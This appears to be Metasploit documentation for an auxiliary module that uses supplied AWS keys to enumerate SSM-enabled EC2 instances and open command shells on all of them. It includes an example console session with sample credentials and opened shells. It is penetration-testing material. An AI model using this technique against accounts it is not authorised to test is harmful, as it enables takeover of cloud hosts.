documentation/modules/auxiliary/cloud/aws/enum_ssm.md
Provided AWS credentials, this module will call the authenticated API of Amazon Web Services to list all SSM-enabled EC2 instances accessible to the account. Once enumerated as SSM-enabled, the instances can be controlled using out-of-band WebSocket sessions provided by the AWS API (nominally, privileged out of the box). This module provides not only the API enumeration identifying EC2 instances accessible via SSM with given credentials, but enables session initiation for all identified targets (without requiring target-level credentials) using the CreateSession datastore option. The module also provides an EC2 ID filter and a limiting throttle to prevent session stampedes or expensive messes.
ACCESS_KEY_ID, SECRET_ACCESS_KEY, REGIONOnly return the specified number of results from each region.
Look for specific EC2 instance ID.
AWS Region (e.g. "us-west-2").
Create a new session for every successful login.
Enumerating EC2 instances in the US-East-2 region and opening a session on each one (CreateSession is True).
msf auxiliary(cloud/aws/enum_ssm) > set ACCESS_KEY_ID AKIAO5WK2W9TMZT7EAM5
ACCESS_KEY_ID => AKIAO5WK2W9TMZT7EAM5
msf auxiliary(cloud/aws/enum_ssm) > set SECRET_ACCESS_KEY pDNhoEPuubvWSsp18axjPFBM4sNme6vnNUFb6qWo
SECRET_ACCESS_KEY => pDNhoEPuubvWSsp18axjPFBM4sNme6vnNUFb6qWo
msf auxiliary(cloud/aws/enum_ssm) > run
[*] Checking us-east-2...
[+] Found AWS SSM host i-02cd668d50587bdcf (ip-172-31-42-215.us-east-2.compute.internal) - 172.31.42.215
[*] AWS SSM command shell session 3 opened (192.168.250.134:39005 -> 172.31.42.215:0) at 2023-05-22 16:43:03 -0400
[+] Found AWS SSM host i-074187bde1453613a (EC2AMAZ-HM7U6TS.WORKGROUP) - 172.31.44.170
[*] AWS SSM command shell session 4 opened (192.168.250.134:37231 -> 172.31.44.170:0) at 2023-05-22 16:43:05 -0400
[*] Auxiliary module execution completed
msf auxiliary(cloud/aws/enum_ssm) >